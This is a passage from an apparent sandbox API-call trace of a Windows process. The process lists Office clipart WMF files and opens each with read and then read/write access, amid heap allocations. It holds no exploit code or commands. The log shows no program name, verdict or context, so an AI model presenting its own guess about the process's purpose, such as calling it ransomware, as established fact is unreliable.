InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.070] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ba0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN00965_.WMF", cAlternateFileName="")) returned 1 [0101.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0101.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0101.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0101.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0101.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0101.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0101.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0101.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0101.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0101.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0101.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0101.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.071] AreFileApisANSI () returned 1 [0101.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0101.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.071] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0101.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0101.071] AreFileApisANSI () returned 1 [0101.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0101.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 69 [0101.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.072] GetFileType (hFile=0x368) returned 0x1 [0101.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0101.072] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.072] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.072] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.072] CloseHandle (hObject=0x368) returned 1 [0101.073] AreFileApisANSI () returned 1 [0101.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0101.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 69 [0101.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.073] GetFileType (hFile=0x368) returned 0x1 [0101.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0101.073] CloseHandle (hObject=0x368) returned 1 [0101.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0101.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0101.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0101.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0101.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.074] AreFileApisANSI () returned 1 [0101.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0101.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 69 [0101.074] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ba0)) returned 1 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0101.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0101.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.075] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd10, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN01039_.WMF", cAlternateFileName="")) returned 1 [0101.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0101.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0101.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0101.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0101.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0101.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0101.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0101.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0101.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0101.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0101.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.075] AreFileApisANSI () returned 1 [0101.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.075] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0101.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.075] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0101.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.076] AreFileApisANSI () returned 1 [0101.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0101.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 69 [0101.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.076] GetFileType (hFile=0x368) returned 0x1 [0101.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0101.076] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.076] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.077] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.077] CloseHandle (hObject=0x368) returned 1 [0101.077] AreFileApisANSI () returned 1 [0101.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0101.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 69 [0101.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.077] GetFileType (hFile=0x368) returned 0x1 [0101.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0101.077] CloseHandle (hObject=0x368) returned 1 [0101.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.078] HeapFree (in: hHeap=0x20000, 